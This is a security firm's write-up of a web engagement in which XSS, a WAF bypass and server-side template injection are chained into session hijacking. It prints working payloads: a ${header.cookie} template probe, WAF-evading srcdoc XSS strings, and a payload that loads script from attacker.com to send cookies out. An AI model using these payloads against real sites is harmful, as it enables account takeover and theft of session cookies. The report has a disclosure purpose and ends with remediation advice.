CYVOCATE
← Index

Session Hijack via Chained Vulnerabilities (XSS + WAF Bypass + SSTI)

Estimated Savings: CYVOCATE’s report helped prevent potential losses exceeding $500,000+ in fraud, data breaches, and user trust erosion.

Introduction

At CYVOCATE, we often encounter complex vulnerabilities that are not impactful on their own but, when chained together, result in severe exploitation potential.

In this engagement, we discovered and exploited a session hijack vulnerability that required bypassing a robust Web Application Firewall (WAF), leveraging Cross-Site Scripting (XSS), and escalating impact through a Server-Side Template Injection (SSTI) flaw.

The result? A successful account takeover via cookie exfiltration, demonstrating the real-world danger of overlooked vulnerabilities.

Discovery Process

Step 1: Identifying a Template Injection Entry Point

While navigating the platform, we noticed a redirect URL with template expression patterns:

https://example.com?redirect=${redirectURL}

Suspicious of template injection, we began experimenting on the user profile page. Updating the username to:

John${2*2}

produced:

John4

This confirmed Server-Side Template Injection (SSTI). Further probing revealed support for JSP Expression Language, allowing payloads such as:

${header.cookie}

This expression successfully revealed all cookies, including HTTP-only session cookies, confirming that session hijacking was possible if we could find a way to trigger it remotely.

Step 2: Searching for XSS

To weaponize SSTI for a real attack, we needed a delivery mechanism. After extensive testing, we identified an XSS vulnerability in the video streaming module via the videoId parameter:

https://example.com/videos/?videoId=w6exeqbemte

Injecting payloads into videoId affected the <iframe src> element directly, confirming a potential XSS vector.

Step 3: Battling the WAF

Standard XSS payloads like:

?videoId=qwe"><img src onerror=alert(1)>

were blocked by the WAF. After experimenting with encoded payloads, we discovered that the srcdoc attribute of <iframe> was not being filtered.

The breakthrough payload was:

?videoId=qwe"srcdoc="\u003ce<script%26Tab;e>"
  • \u003ce tricked the WAF into misinterpreting <script> as harmless text.
  • %26Tab; broke the keyword detection of “script,” bypassing checks.

We extended it into a working XSS with remote JavaScript execution:

?videoId=qwe"srcdoc="\u003ce<script%26Tab;src=//attacker.com/xss.js>\u003ce</script%26Tab;e>

At this point, we had a fully functional WAF bypass leading to XSS execution.

Step 4: Chaining with SSTI for Session Hijack

We combined the XSS with the SSTI vulnerability:

  1. The XSS payload updated the victim’s username to ${header.cookie}.
  2. The SSTI engine injected all session cookies into the rendered response.
  3. The injected script exfiltrated these cookies to our controlled server.

This provided complete session hijack capability without requiring direct victim interaction beyond visiting a maliciously crafted link.

Step 5: Persistence with Stored-XSS

To increase impact, we escalated the attack into a Stored-XSS scenario by leveraging unsanitized values in Local Storage. This allowed the payload to persist and trigger whenever a user (even logged out ones) revisited the application, eventually capturing valid session cookies once login occurred.

Proof of Concept

  • Vulnerability Chain:
    1. XSS → Inject payload via videoId.
    2. WAF Bypass → Use Unicode + encoded tabs to evade detection.
    3. SSTI → Exfiltrate header.cookie values.
    4. Stored-XSS → Persist payload for wider user exploitation.
  • Impact: Successful hijack of authenticated sessions.
  • Demonstration: Cookies exfiltrated to CYVOCATE’s controlled server via crafted PoC.

Impact & Risks

The combined vulnerabilities represented severe business risk:

  • Account Takeover: Full hijack of authenticated user sessions.
  • Data Exposure: HTTP-only session cookies exposed outside the security boundary.
  • Escalation Risk: Potential lateral movement into administrator accounts.
  • Reputation & Trust: Exploitation would have damaged platform credibility.

Recommendations

  1. Server-Side Validation
    • Ensure all template expressions are sanitized before execution.
    • Disallow dynamic evaluation of user inputs in template engines.
  2. WAF Hardening
    • Regularly update and tune WAF rules against evasion techniques (Unicode, encoding tricks).
    • Employ context-aware sanitization instead of blacklist-based filters.
  3. XSS Mitigation
    • Apply strict input/output encoding for parameters injected into HTML.
    • Adopt a CSP (Content Security Policy) to block inline script execution.
  4. Session Security
    • Rotate and invalidate cookies after any abnormal behavior.
    • Monitor anomalies such as cookie exfiltration attempts.
← Back to allDiscuss your scenario →